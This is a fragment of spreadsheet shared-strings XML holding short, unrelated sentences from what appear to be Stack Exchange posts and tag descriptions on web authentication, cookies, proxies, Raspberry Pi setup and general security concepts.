It now prevents my $video_out from being affected by the streaming, but the streaming itself is very unstable.</t>
  </si>
  <si>
    <t>A trojan is a malicious program which is injected to or poses as a known application.</t>
  </si>
  <si>
    <t>brain mapping, DNA mapping, and extraterrestrial mapping.</t>
  </si>
  <si>
    <t>I am aware of the potential security issues this could bring, which is why the account we crated for this use can only view (and not edit) very specific pages.</t>
  </si>
  <si>
    <t>It operates as a man-in-the-middle between your browser and the target application, allowing you to: Intercept and modify all HTTP/S traffic passing in both directions.</t>
  </si>
  <si>
    <t>Running the web server as a user with as few privileges as possible is a great ideabut running it with fewer privileges than possible obviously isn't.</t>
  </si>
  <si>
    <t>maybe an https webserver with basic authentication could serve your goals.</t>
  </si>
  <si>
    <t>Sandbox is a security mechanism for containing untrusted programs.</t>
  </si>
  <si>
    <t>A Java based HTTP/HTTPS proxy for assessing web application vulnerability.</t>
  </si>
  <si>
    <t>It may even be worth baking different hostnames into different device firmware versions, so if there is a problem with one you can re-point it at a different endpoint, or cut it off completely, if it is damaging your services.</t>
  </si>
  <si>
    <t>You redirect the user to PayPal's site using that token
The user logs into their PayPal account and selects a shipping address.</t>
  </si>
  <si>
    <t>As opposed to static publishing, which avoids the SilverStripe controller layer on cached pages, partial caching allows caching for pages that contain a mix of moderately static &amp; user specific data, and still provide full access control and permission enforcement.</t>
  </si>
  <si>
    <t>We have a web page that we want to access from a raspberry pi, however the webpage in question is protected with windows authentication.</t>
  </si>
  <si>
    <t>This would be a useless question without the code, so here it is (without the internet login info of course ...</t>
  </si>
  <si>
    <t>So the basic question is: Should I get started with sockets or is there a better and safer way to do it?</t>
  </si>
  <si>
    <t>I have a new rasperryPi webserver running raspbian that I'm trying to use to proxy to web-enabled device from FieldServer Tech (fieldserver.com) on our intranet.</t>
  </si>
  <si>
    <t>Now, when I introduce my public ip in the browser I always get the Nginx initial screen.</t>
  </si>
  <si>
    <t>From what I understand, browsers will only allow access to this cookie from the site that saved it.</t>
  </si>
  <si>
    <t>If I access the page 'in an normal way' the user and password promt get shown from the browser.</t>
  </si>
  <si>
    <t>What I want is my session to be saved after I click a link to one of the Raspberry Pis from the central login system.</t>
  </si>
  <si>
    <t>Clicking on Submit button should do a POST to 192.168.0.1/configure.html
Configure.html is a web page with a form, where SSID and password would be input.</t>
  </si>
  <si>
    <t>Also, when I try to logout from the system, I  don't be redirected to the login page, but the system reloads the same desktop view as before.</t>
  </si>
  <si>
    <t>The download link should now work instead of going to "Page not found" (if you are still logged into your Microsoft account).</t>
  </si>
  <si>
    <t>You could acquire the cookie, by first visiting the site with the browser and copy paste the cookie into your code.</t>
  </si>
  <si>
    <t>The python script will then run until the tmux session is killed, even if your ssh session exits.</t>
  </si>
  <si>
    <t>But remember, you most likely have to have elevated privileges to execute those commands.</t>
  </si>
  <si>
    <t>phpseclib is a PHP library that provides pure-PHP implementations of:
 - BigIntegers
 - RSA
 - SSH2
 - SFTP
 - X.509
 - Symmetric key encryption
 - AES
 - Rijndael
 - DES
 - 3DES
 - RC4
 - Blowfish
 - Twofish</t>
  </si>
  <si>
    <t>Questions related to cookies which should be sent only via HTTP.</t>
  </si>
  <si>
    <t>Cross Site "Scripter" (XSSer) is an automatic framework that detects, exploits and inform of XSS vulnerabilities in web applications.</t>
  </si>
  <si>
    <t>Use this tag when your question relates to one of the active HackerRank challenges.</t>
  </si>
  <si>
    <t>Questions on this tag should relate to the process of submitting, and certifying such an app.</t>
  </si>
  <si>
    <t>Directory traversal attacks are commonly performed using Web browsers.</t>
  </si>
  <si>
    <t>Questions regarding security of payment card data may want to consider using the pci-dss tag.</t>
  </si>
  <si>
    <t>This meaningless tag is apparently intended to embrace two-way authentication of SSL sessions.</t>
  </si>
  <si>
    <t>Use this tag for questions related to private subnets, i.e.</t>
  </si>
  <si>
    <t>Use this tag for questions related to a Hash Code's Uniqueness, i.e.</t>
  </si>
  <si>
    <t>Selenium EdgeDriver is a WebDriver implementation that controls the Microsoft Edge browser using a MicrosoftWebDriver server.</t>
  </si>
  <si>
    <t>Use this tag for questions related to the usage of git-crypt.</t>
  </si>
  <si>
    <t>Use this tag for questions related to Devise Token Auth.</t>
  </si>
  <si>
    <t>Internet Explorer 6 has many documented bugs, and the browser will be officially suppported until 2014.</t>
  </si>
  <si>
    <t>Conceptual questions about encryption may get better answers on crypto.stackexchange.com.</t>
  </si>
  <si>
    <t>This tag should be used for questions about Trusty Trusted Applications and its communication with Android applications.</t>
  </si>
  <si>
    <t>Cookiebot is a freemium service to manage visitor's preferences about cookies.</t>
  </si>
  <si>
    <t>Please use this tag when asking questions about a site that has been compromised by attackers.</t>
  </si>
  <si>
    <t>Different implementation to smali/baksmali, same syntax, but with support to escape in type desc "Lcom/dex2jar\t\u1234;"
other tools: d2j-decrypt-string
Official website
dex2jar</t>
  </si>
  <si>
    <t>This page describes how to integrate Google's Federated Login for a web site or application.</t>
  </si>
  <si>
    <t>Indeed you can even access your home LAN from outside via reverse proxy if you set it.</t>
  </si>
  <si>
    <t>Implementations are available in other languages too, see the RNCryptor project page for more details.</t>
  </si>
  <si>
    <t>The server can maintain a session in many ways such as using cookies or rewriting URLs.</t>
  </si>
  <si>
    <t>Use this tag for questions about how to stop or prevent the abuse of systems by irresponsible users.</t>
  </si>
  <si>
    <t>Page Permissions
Permissions related to management of Facebook Pages.</t>
  </si>
  <si>
    <t>It may be regarded as something like the first introduced digital currency bitcoin.</t>
  </si>
  <si>
    <t>A "remember me" option is often used on login forms on websites.</t>
  </si>
  <si>
    <t>Use this tags for questions concerning peek &amp; pop behaviour on iPhone 6S.</t>
  </si>
  <si>
    <t>Additionally, cookies need to be enabled, as explained on this Google page.</t>
  </si>
  <si>
    <t>Tag usage
The cfml tag has been de-synonymised from the coldfusion tag to be its own distinct tag.</t>
  </si>
  <si>
    <t>This tag is used for topics relating to application security and attacks against software.</t>
  </si>
  <si>
    <t>If your question is regarding security of payment card data, then you may want to consider using the pci-dss tag.</t>
  </si>
  <si>
    <t>Questions should be about the  CLI itself, and not questions related to installing certificates generated by certbot.</t>
  </si>
  <si>
    <t>If you don't know what you're doing it's really easy to create sites vulnerable to attack.</t>
  </si>
  <si>
    <t>Web Browsers such as google-chrome and firefox using varying sandboxing techniques, to protect the users from malicious code infecting the system.</t>
  </si>
  <si>
    <t>Questions that should be tagged with 
Authenticating a user against with Zend Framework.</t>
  </si>
  <si>
    <t>To prevent cross-domain scripting, browsers normally block XMLHttpRequest (XHR) requests to other domains.</t>
  </si>
  <si>
    <t>To change .profile, type the following exactly (better to use copy-paste):
The file .profile is read during login, so to activate the change you must log out and log in again.</t>
  </si>
  <si>
    <t>This tag is for specific questions about APIs exposed by Jet.com e-commerce platform</t>
  </si>
  <si>
    <t>Elevated privileges are higher privileges, offered by an operating system.</t>
  </si>
  <si>
    <t>In production, I was curious to know where each of the certificates would be placed i.e on Device or IoT Hub or somewhere else : 
Root Certificate - Uploaded on Azure Portal
Verified Certificate - Uploaded on Azure Portal
PFX File - On Device 
Intermediate Certificates (Chain of Trust) - ???</t>
  </si>
  <si>
    <t>So I made this quick log-in register page with Pyramid as the framework and using JSON, the register works fine and adds the inputted data into the MongoDB database but the log-in doesn't work, always invalid, although the else in the loop always works.</t>
  </si>
  <si>
    <t>Such identification enables interaction with representations of the web resource over a network, typically the World Wide Web, using specific protocols.</t>
  </si>
  <si>
    <t>It's unique to the page's origin for privacy reasons, yet it will be persisted across browsing sessions like a cookie, after the first time either camera or microphone permission has been granted once to a page from your origin.</t>
  </si>
  <si>
    <t>You'll need to trust it in your keychain:
https://support.apple.com/kb/PH25443?locale=en_US&amp;viewlocale=en_US
You can temporarily bypass the problem Safari by clicking "visit site", but the long term solution is to click the other option, view the cert, drag it to your desktop, open it in Keychain and then trust it.</t>
  </si>
  <si>
    <t>Second, scripts are constrained by the same origin policy: scripts from one Web site do not have access to information such as usernames, passwords, or cookies sent to another site.</t>
  </si>
  <si>
    <t>Requirements
php 4.3+
mysql 4+
Installation
Download the file above and unzip it
Upload the sqlbuddy folder to your web server
Point your browser to the sqlbuddy folder
Log in using your existing MySQL credentials
Links
Website
GitHub repo
SQL Buddy's Google Groupe</t>
  </si>
  <si>
    <t>In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received
by the browser.</t>
  </si>
  <si>
    <t>As the provided documentation (Proxy and Protocol guide) explains only about proxy classes but needing few more help and the directions to develop the pool proxy.</t>
  </si>
  <si>
    <t>This seems to be related to the issue described here: https://askubuntu.com/questions/116020/python-https-requests-urllib2-to-some-sites-fail-on-ubuntu-12-04-without-proxy
I followed some of the information on the post above to create an example script that will PUT to /ws/Messaging using a secure connection by forcing TLS 1.0 on Raspbian (2013-02-09):</t>
  </si>
  <si>
    <t>My problem is that I can't close the ssh session without the web server stopping to work, because when the session closes, a logout is performed automatically.</t>
  </si>
  <si>
    <t>On these pages you can find updates, documentation and information about identity server and related projects from us and the community.</t>
  </si>
  <si>
    <t>... and much more
Official Website: http://jasypt.org/
Useful Links: 
API Documentation (JavaDoc)
FAQ
How to encrypt user passwords (example)</t>
  </si>
  <si>
    <t>This tag is used for questions concerning the User Account Control (UAC) security feature of Windows Vista, Windows7, 8 and higher versions of Windows.</t>
  </si>
  <si>
    <t>From Wikipedia:  
In computer security, a side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g.</t>
  </si>
  <si>
    <t>Mechanize automatically stores and sends cookies, follows redirects, can follow links, and submit forms.</t>
  </si>
  <si>
    <t>Whenever I log in through SSH, or even when I log in on the raspberry's terminal, it always logs in as root, instead of that user.</t>
  </si>
  <si>
    <t>However when it is all done, and I try and log in....
Reload privilege tables now?</t>
  </si>
  <si>
    <t>Logging into the portal as admin may or may not be required but that is how I do it.</t>
  </si>
  <si>
    <t>An ordinary user can't kill a process being run by root.</t>
  </si>
  <si>
    <t>Tag to be used for all authentication questions regarding Microsoft's SQL Server product.</t>
  </si>
  <si>
    <t>Questions about bypassing somebody else's spam filter are also not welcome.</t>
  </si>
  <si>
    <t>You might also add the generic blockchain-tag to your question.</t>
  </si>
  <si>
    <t>My Pi is connected via wifi to my router, and my pc is also wirelessly connected to the router
Things i tried :
Logging in as The User and password setup in the Preferences &gt;&gt;&gt; Raspberry Pi configuration on the Pi &gt;&gt; "MyPi" with the password i set
Logging in as the pi user with raspberry password
Logging in as root.</t>
  </si>
  <si>
    <t>For security and cross-plattform reasons, a web application is limited to a sandbox.</t>
  </si>
  <si>
    <t>Burp is a proxy tool which is used for intercepting proxy server for security testing of web applications.</t>
  </si>
  <si>
    <t>This tag would be appropriate for programming questions about spam classification, etc.</t>
  </si>
  <si>
    <t>The motions again get translated to codes that you transmit over the bluetooth link.</t>
  </si>
  <si>
    <t>It requires root, but all the preview images should allow root access.</t>
  </si>
  <si>
    <t>A sandbox is a security mechanism for containing and restricting untrusted programs.</t>
  </si>
  <si>
    <t>To learn more, visit:
http://framework.zend.com/manual/en/zend.auth.introduction.html</t>
  </si>
  <si>
    <t>Out-of-browser applications are subject to the same security sandbox restrictions as ordinary in-browser applications.</t>
  </si>
  <si>
    <t>Allows for syncing of apps, extensions, settings, themes, auto-fill, bookmarks, omni-box history, passwords, and open tabs in Google Chrome and Chromium browsers between multiple platforms and operating systems.</t>
  </si>
  <si>
    <t>Implementing the usual OAuth 2.0 flow is trivial, but very inconvenient for the user (lesser Raspberries won't have enough memory, or the browser is not installed, or it crashes (usual thing with Midori), or thousand other reasons).</t>
  </si>
  <si>
    <t>The Google Site Verification API is intended for developers who want to write applications or services that automate the process of verifying ownership of a site or domain.</t>
  </si>
  <si>
    <t>I know you can get an irq when a pin changes via wiringPi (when running with admin privileges), so if there's a free timer peripheral it seems possible.</t>
  </si>
  <si>
    <t>Security and validation isn't a concern because I just need to get the concept working and that will be fine, however I have no clue how to go about doing this without connecting to the internet.</t>
  </si>
  <si>
    <t>I am trying to import the company Root certificate to access intranet sites in Raspberry PI.</t>
  </si>
  <si>
    <t>Network topology:
The question is how to setup captive portal on different device then access point (iptables, proxy, ...)?</t>
  </si>
  <si>
    <t>You can run a web server to proxy things just like you would on any normal setup, and https should work as well.</t>
  </si>
  <si>
    <t>https://serverfault.com/questions/94503/login-without-running-bash-profile-or-bashrc</t>
  </si>
  <si>
    <t>If security is a concern, sending data from an arduino may not be the best implementation(they can't deal with any reasonable encryption).</t>
  </si>
  <si>
    <t>Fortunately it is not complicated to create custom profile, which will be "placeholder" for application specific data you have to transmit.</t>
  </si>
  <si>
    <t>It seems that you have misconfigured profile (Your profile that saves all data inside including the cookies).</t>
  </si>
  <si>
    <t>In the nginx side the only thing you will have to do is to create a reverse proxy.</t>
  </si>
  <si>
    <t>MIFARE Ultralight/NTAG tags don't support the authentication mechanism performed by  (which is specific to MIFARE Classic).</t>
  </si>
  <si>
    <t>I'd hope there are better fail-safes then this timing but the intention might be to prevent the wrong tags from taking a JA.</t>
  </si>
  <si>
    <t>If this is testing and you are not concerned about preexisting data related to this device, you can delete the device from the hub and do a re-provision.</t>
  </si>
  <si>
    <t>Proxy classes are implementation of Proxy design pattern.</t>
  </si>
  <si>
    <t>Medium trust is the default trust level in ASP.NET.</t>
  </si>
  <si>
    <t>This tag deals with problems relating to the management of user credentials in a system.</t>
  </si>
  <si>
    <t>There are many situations when you need a php script to login into a website and open a certain page.</t>
  </si>
  <si>
    <t>rvest is a package for R which provides functions for scraping information from web pages.</t>
  </si>
  <si>
    <t>Cross browser testing is the testing of a website or web-application on different browsers for compatibility.</t>
  </si>
  <si>
    <t>SOCKS servers are a form of proxy that are commonly used in firewalled LAN environments to allow access between networks, and often to the Internet.</t>
  </si>
  <si>
    <t>This tag helps organize hashcat-specific questions that might otherwise be placed under more general tags, such as hash or brute-force.</t>
  </si>
  <si>
    <t>Tag for questions related to MySQL's socket authentication plugin.</t>
  </si>
  <si>
    <t>Use this tag for questions related to the Windows Communication Foundation Authentication Service.</t>
  </si>
  <si>
    <t>For questions relating to network security, local or internet, with respect to programming.</t>
  </si>
  <si>
    <t>This tag should be used for `JSONDecoder` (introduced in Swift 4) questions for decoding JSON decoder on Apple platforms.</t>
  </si>
  <si>
    <t>An HTTP cookie is a piece of data stored by the user's web browser.</t>
  </si>
  <si>
    <t>Full trust is a trust level in ASP.NET.</t>
  </si>
  <si>
    <t>Use this tag for programming questions related to Secure Shell.</t>
  </si>
  <si>
    <t>Boost.Uuid is a C++ library that provides an implementation of Universally Unique Identifiers.</t>
  </si>
  <si>
    <t>So the exploit does not grant direct access to the browser-history, but the exploiting party has to check explicitly for every site in question.</t>
  </si>
  <si>
    <t>The security model behind Java applets has been designed with the goal of protecting the user from malicious applets.</t>
  </si>
  <si>
    <t>Applets that are not signed are restricted to the security sandbox, and run only if the user accepts the applet.</t>
  </si>
  <si>
    <t>User profiles can contain various user-related content - first/last name, nickname, avatar, email address and other user-specific fields.</t>
  </si>
  <si>
    <t>UC Browser's servers act as a proxy which compresses the data of web pages before sending it to users.</t>
  </si>
  <si>
    <t>This tag is used for questions related to the subnets of a (virtual) private network.</t>
  </si>
  <si>
    <t>Clean user-submitted content against a safe white-list, to prevent XSS attacks.</t>
  </si>
  <si>
    <t>A ddos tag also exists for distributed denial-of-service attacks.</t>
  </si>
  <si>
    <t>This tag is used for questions concerning the User Account Control (UAC) security feature of Windows Vista, Windows 7, 8 and higher.</t>
  </si>
  <si>
    <t>The attacker tries to get the user's own web browser (or web application) to execute unwanted commands.</t>
  </si>
  <si>
    <t>This tag is designated for software related interfacing with networking protocols.</t>
  </si>
  <si>
    <t>External links
PKCS#11 documents links at OASIS
OASIS PKCS 11 technical committee
Cryptsoft's PKCS#11 page</t>
  </si>
  <si>
    <t>Security can be an issue, due to security compromises like a Man In The Middle attack.</t>
  </si>
  <si>
    <t>These signatures don't have specialized tags, please use more generic tags such as email and pdf instead.</t>
  </si>
  <si>
    <t>Something that requires root or would run my program as root is a non issue and perfectly acceptable (completely disconnected devices, so if running as root gives an easier solution do not hesitate to go with that)</t>
  </si>
  <si>
    <t>However, I am working on an accounts system and set up this simple page and put it in the www folder that includes my index files and named it login.php:
However, whenever I go to website.com/login.php on a separate PC, Chrome says "The website.com page isn't working.</t>
  </si>
  <si>
    <t>The problem here is that I could not find conclusive evidence that it will function with all games on my PC, while not triggering bans from anti-cheat engines like 'VAC' and 'Easy Anti-Cheat'.</t>
  </si>
  <si>
    <t>I suggest trying with exec instead of shell_exec (there is a difference between the two):
Another source of your problem could be permission related:
The webserver usually runs as a different user.</t>
  </si>
  <si>
    <t>In daily use browser automation can be used to fill forms, extract data from web pages, or provide authentication to a service.</t>
  </si>
  <si>
    <t>This tag should be used if the question is about the jKey plugin and is not generally a question about key combination recognition in JavaScript.</t>
  </si>
  <si>
    <t>Chrome Remote Desktop allows users to remotely access another computer through Chrome browser or a Chromebook.</t>
  </si>
  <si>
    <t>"An Introduction to Content Security Policy" - HTML5Rocks
A detailed tutorial which includes details on implementation, best practices, use cases, and speculation about the future of CSP.</t>
  </si>
  <si>
    <t>You may query your local DNS server and receive a response back that indicates the type of visitor to your site, how threatening that visitor is, and how long it has been since the visitor has last been seen within the Project Honey Pot trap network.</t>
  </si>
  <si>
    <t>The browser same-origin security policy prohibits a browser client app running in the context of one web server domain (DNS name) from communicating with, sharing data with, or reading data from browser client code running in the context of a different web server domain.</t>
  </si>
  <si>
    <t>The core is a linked collection of servers that handles authentication, mobility management, call control, billing, data sessions and connection to the internet, as well as services like SMS and USSD.</t>
  </si>
  <si>
    <t>The problem is that theres no safe and portable way to use shifting for sign extension in C  at best it is implementation defined.</t>
  </si>
  <si>
    <t>Websauna is a Python framework for building web services and back offices with admin interface and sign up process.</t>
  </si>
  <si>
    <t>This chapter suggests many ways of tampering with input and may even include common attack patterns, but does not go into detail on the most famous of web security flaws such as XSS, CSRF, and SQL Injection.</t>
  </si>
  <si>
    <t>It reads metadata from your models to provide a quick, model-centric interface where trusted users can manage content on your site.</t>
  </si>
  <si>
    <t>I suggest that you try the following (note that you may need to read a page from the tag after detecting the tag and before issuing that authentication command):
If that works, the NTAG PWD_AUTH command might not be supported by the PN532 MIFARE PCD mode.</t>
  </si>
  <si>
    <t>From this article:
For both APIs, proxy settings are automatically obtained from Internet Explorer/Microsoft Edge settings and are used for all the HTTP calls by default.</t>
  </si>
  <si>
    <t>In the cookie policy of the implementing website, Cookiebot can display a form to make possible for the visitor to change his/her decision about cookies accepted or denied.</t>
  </si>
  <si>
    <t>I've been trying to use Selenium 3.141.0 and Python3.6 to automate logging in to some websites on a Pi that's running Raspbian.</t>
  </si>
  <si>
    <t>From http://ftp1.digi.com/support/documentation/90000976_C.pdf (you should look at the correct version for your hardware, though), it looks like the purpose of a coordinator is to automatically determine the channel:
Coordinator Operation
Forming a Network
The coordinator is responsible for
  selecting the channel, PAN ID (16-bit
  and 64-bit), security policy, and
  stack profile for a network.</t>
  </si>
  <si>
    <t>Main question is how can I do this:
When the user logs in from a specific address for example user 1 get sitename.com/project/userid1 link.</t>
  </si>
  <si>
    <t>FYI: You must be root when working with mavproxy so,  
or sudo -s
Also, you must be a member of the dialout group, so do this at CMD line:
    sudo usermod -a -G dialout root (enable root user!)</t>
  </si>
  <si>
    <t>This is typically used when either you don't have the root certificate, Baltimore CyberTrust, or your device does not have the concept of a trusted root certificate store.</t>
  </si>
  <si>
    <t>Use case
A quick application could replace the login system of your site so that users can login to your website via Twitter.</t>
  </si>
  <si>
    <t>A correct implementation should
Not allow photos to be accessed that would not normally be publicly accessible.</t>
  </si>
  <si>
    <t>If you are looking for an alternative to cookies that aren't sent in HTTP headers and can store more data, consider local-storage
Implementation Hint
For jquery fans, there is a simple plugin make it easy to deal
  with cookies (write, read and delete) could be found here.</t>
  </si>
  <si>
    <t>I'm using the okhttp3 library &amp; added implementation 'com.squareup.okhttp3:okhttp:3.6.0' to the Gradle build file &amp; added internet permissions to the manifest.</t>
  </si>
  <si>
    <t>Also, as Tim said, you could try out the python logging library, but I think just writing to a file is quicker and easier, although you might run into some issues with permissions...</t>
  </si>
  <si>
    <t>Use this tag for questions about Bogus, a .NET library for generating fake data.</t>
  </si>
  <si>
    <t>Morphia is a lightweight type-safe library for mapping Java objects to/from MongoDB.</t>
  </si>
  <si>
    <t>Online retrieval follows either the WS-Metadata Exchange protocol or the DISCO protocol 
http://msdn.microsoft.com/en-us/library/aa347733.aspx</t>
  </si>
  <si>
    <t>It also supports password generation, site sharing and site logging.</t>
  </si>
  <si>
    <t>WordPress 4.5.1 and earlier are affected by a SOME vulnerability through Plupload, the third-party library WordPress uses for uploading files.</t>
  </si>
  <si>
    <t>The Pi OS: Raspbian Jessie 
Version: September 2016
Kernel Version: 4.4
I already tried with:
Adding:
@/usr/bin/chromium --kiosk --ignore-certificate-errors --disable-restore-session-state "http://www.domain.com"
to the end of ~/.config/lxsession/LXDE-pi/autostart
and
sudo nano /etc/xdg/lxsession/LXDE-pi/autostart 
@chromium kiosk http://www.domain.com
@xset s noblank
@xset s off
@xset dpms
But nothing worked.</t>
  </si>
  <si>
    <t>---&gt; Interop+Crypto+OpenSslCryptographicException: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
When I manually update the injected EdgeHubConnectionString (export EdgeHubConnectionString=...) to the one taken from the Device Details page on the IoT hub blade in the Azure portal, then Mqtt over websockets starts working.</t>
  </si>
  <si>
    <t>I have pretty much the same thing working for me, I don't have a problem with locking up, but in my testing, I did notice that certain web browsers send quite a bit of information to the "web server" regarding the request.</t>
  </si>
  <si>
    <t>https://pygodaddy.readthedocs.org/en/latest/
Features
Login with a USERNAME and a PASSWORD
CREATE, READ, UPDATE, DELETE your domain's DNS Records (A-Record only for now)
Visit the project page on GitHub.</t>
  </si>
  <si>
    <t>I'm trying to setup a captive portal with a dnsmasq to resolve all domains to an internal IP address.</t>
  </si>
  <si>
    <t>But android does not popup a captive portal, and I can see the requests for clients3.google.com
The way I do the captive portal is by redirecting port 53 (udp) to my apache server, and there display the login page for the access point.</t>
  </si>
  <si>
    <t>I know how to create a new user on the Pi with all the same privileges as pi from this: https://raspberrypi.stackexchange.com/questions/7133/how-to-change-pi-sudo-permissions
But how do you create a user with just one file permission?</t>
  </si>
  <si>
    <t>https://sso.toutiao.com/login/?next=/&amp;service=https://mp.toutiao.com/sso_confirm/?redirect_url=/
I am trying to reach the website above and  automaticlly fill username using selenium and python.</t>
  </si>
  <si>
    <t>I have problem getting platformio to find header file for a certian library, I am using it pretty basic as the example for the library.</t>
  </si>
  <si>
    <t>In case you are wondering why all of this, I am testing with mitmproxy as a man-in-the-middle attack following this guide.</t>
  </si>
  <si>
    <t>A few questions come to mind:
How can I clean the twin record completely short of deregistering and re-registering the device?</t>
  </si>
  <si>
    <t>As explained here:
https://raspberrypi.stackexchange.com/questions/14953/is-it-possible-to-boot-the-raspberry-pi-in-secure-mode
When the  bit of the SCR register is 0, it means that you are in Secure Mode, which is the case at boot on my Raspberry.</t>
  </si>
  <si>
    <t>You could place a man in the middle (aka proxy) between your client and the server to detect such events.</t>
  </si>
  <si>
    <t>Regarding your school's Wi-Fi, it's very likely using 802.1X authentication, which uses Certificates for security, see: https://raspberrypi.stackexchange.com/questions/23079/how-to-connect-to-802-1x-eap-wireless-network-with-debian-wheezy</t>
  </si>
  <si>
    <t>Each page GET should be authenticated as well, and to achieve that you may consider using the standard http cookie mechanism.</t>
  </si>
  <si>
    <t>I generated the SAS from a prebuilt version of Device explorer
This worked because, as explained in Control access to IoT Hub:
The only way that IoT Hub authenticates a specific device is using the
  device identity symmetric key.</t>
  </si>
  <si>
    <t>I think this works because the autostart-script launches when you log into your user and not on boot, therefore the program can launch properly.</t>
  </si>
  <si>
    <t>But the recently launched Cloud Functions for Firebase can also serve as such a trusted environment.</t>
  </si>
  <si>
    <t>The limitation of 5 simultaneous connections means that  an ESP8266 will not be able to successfully act as a proxy for a web browser.</t>
  </si>
  <si>
    <t>If your clients connects from browser, it is better to not use iot:ClientId as clientId must be unique so user will not be able to open multiple browser tabs.</t>
  </si>
  <si>
    <t>SOP stands for Same-Origin Policy, a fundamental security mechanism within web browsers.</t>
  </si>
  <si>
    <t>Em-proxy is a Ruby EventMachine Proxy DSL for writing high-performance transparent / intercepting proxies in Ruby.</t>
  </si>
  <si>
    <t>Use this tag for questions related to the creation, storage and usage of secret keys.</t>
  </si>
  <si>
    <t>Subresource integrity is a draft mechanism to let browsers verify the integrity of web resources.</t>
  </si>
  <si>
    <t>Hosted Selenium scripts to monitor your website with real browser activity.</t>
  </si>
  <si>
    <t>If your question is not about a specific programming problem, please consider instead asking it at Information Security SE: https://security.stackexchange.com</t>
  </si>
  <si>
    <t>Use this tag for programming questions related to virus scanning on any platform/OS.</t>
  </si>
  <si>
    <t>Use this tag for questions dealing with Oracle Fine Grained Access Control and the `DBMS_RLS` package,</t>
  </si>
  <si>
    <t>Use for questions concerning the Python stdlib module which provides secure and portable password input</t>
  </si>
  <si>
    <t>Zend Auth provides helper functions to authenticate site visitors against various sources.</t>
  </si>
  <si>
    <t>A proxy auto config file (PAC) is used by a web browser (or other agent) to choose the proxy server to be used using the specified URL as a criteria for the selection.</t>
  </si>
  <si>
    <t>Also note that ACCESSKEY settings override those of the main Internet Explorer menus.</t>
  </si>
  <si>
    <t>Cookies contain a session ID  not the data itself (unless youre using the cookie based backend or a custom backend).</t>
  </si>
  <si>
    <t>Tagging Guidance:
Please do not tag Tampermonkey questions with userscripts, unless the script is meant to also work as a native Chrome userscript (which is usually not the case).</t>
  </si>
  <si>
    <t>References and Resources:
The Tampermonkey page at the Chrome Web Store.</t>
  </si>
  <si>
    <t>The library hides a lot of technical details from the SSH protocol, but this does not mean that you should not try to know about and understand these details.</t>
  </si>
  <si>
    <t>Questions on this tag should be related with security issues with Android application or Android platform itself.</t>
  </si>
  <si>
    <t>Although cookies have many historical infelicities that degrade their security and privacy, the Cookie and Set-Cookie header fields are widely used on the Internet.</t>
  </si>
  <si>
    <t>This conserves server memory, allows larger uploads, and helps prevent Denial of Service attacks.</t>
  </si>
  <si>
    <t>A common implementation of this algorithm is:
Leap Year Bugs
Leap years can create bugs in software.</t>
  </si>
  <si>
    <t>Ravenscar for multiprocessor systems adapts a safe and widely used tasking profile to modern architectures.</t>
  </si>
  <si>
    <t>It is considered one of the important methods to lower chances of failure of a site from a DDOS attack.</t>
  </si>
  <si>
    <t>http://sqlserverplanet.com
http://msdn.microsoft.com/en-us/library/ms189535.aspx
The term SPID is also used in telecommunications for Service Profile Identifier.</t>
  </si>
  <si>
    <t>Unless those questions have a programming related edge, those question are better fitted for ServerFault.</t>
  </si>
  <si>
    <t>HTML sanitization can be used to protect against cross-site scripting (XSS) attacks by sanitizing any HTML code submitted by a user.</t>
  </si>
  <si>
    <t>Questions with this tag should be about a suspected or actual false sharing problem.</t>
  </si>
  <si>
    <t xml:space="preserve">
preventing edits from a document or worksheet, especially in MS Office
security, authorization or preventing hacking</t>
  </si>
  <si>
    <t>In these cases, websites could set a cookie for .co.uk which would be passed onto every website registered under co.uk.</t>
  </si>
  <si>
    <t>Questions about using IPMI tools and monitored hardware can be asked at https://serverfault.com/questions/tagged/ipmi</t>
  </si>
  <si>
    <t>The administrator can choose which apps are allowed for that profile, and can control just what device features are available to the profile.</t>
  </si>
  <si>
    <t>The protocol handler can be registred by application like email client, torrent application, skype application and thus the application can be open from web by clicking on the link.</t>
  </si>
  <si>
    <t>This may be a result of network or system delays; or this may indicate
  that a malicious client is trying to cause a Denial of Service attack
  on the server.</t>
  </si>
  <si>
    <t>I think with moderator privileges, I will be able to further improve the quality of content on this site in ways that are not possible today.</t>
  </si>
  <si>
    <t>In the context of Java applets, this has been asked a number of times on SO that should help you get started:
signed applet
java usb library
Do be aware that there are numerous issues with using the Java browser plugin and users need to accept the plugins security prompt to "trust" your applet.</t>
  </si>
  <si>
    <t>BUT...
You have just allowed an insecure http (unencrypted) access into a device on your home network, which could then be exploited (someone could view your cameras, or perhaps gain further access to the Pi and other devices on your network...)
You can enable authentication for the web control gui in Motion config but its still being served over http and so easy to hack or to intercept.</t>
  </si>
  <si>
    <t>Common types of network servers include:
Web servers
proxy servers
FTP servers
online game servers
Numerous systems use this client / server networking model including Web sites and email services.</t>
  </si>
  <si>
    <t>See Web Authentication: A Web API for accessing scoped credentials:
This specification defines an API that enables web pages to access
  WebAuthn compliant strong cryptographic credentials through browser
  script.</t>
  </si>
  <si>
    <t>Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection.</t>
  </si>
  <si>
    <t>The flow of the application is basically:
Web application
A user creates a profile
A user can register one or more raspberries to their profile.</t>
  </si>
  <si>
    <t>When I upload the program to Arduino and run the login page, I am succesfully redirected to the page stated but nothing shows up on the LCD.</t>
  </si>
  <si>
    <t>The following types of identity can be linked:
Twitter
Facebook
GitHub
Reddit
HackerNews
Web (domain or via file)
Bitcoin
Zcash</t>
  </si>
  <si>
    <t>Official Website: http://projects.spring.io/spring-security/
Useful Links:
Reference
FAQ
API Documentation (JavaDoc)</t>
  </si>
  <si>
    <t>Questions that should have the  tag would include:
achieving an escalation of privileges or entitlements
accessing system file locations
creating 'jailbroken' apps or tweaks to other apps
As the iOS platform is locked from user modification and the confines of the App Store, a need arose to allow users to install apps and change the OS to work around and outside the basic offerings of the OS.</t>
  </si>
  <si>
    <t>I read in the Raspberry Pi Official Documentation that you cannot preview the  using SSH and VNC.</t>
  </si>
  <si>
    <t>Somebody with privileges, please delete this tag.</t>
  </si>
  <si>
    <t>This tag is reserved for any questions involving the Transcrypt Python to JavaScript compiler.</t>
  </si>
  <si>
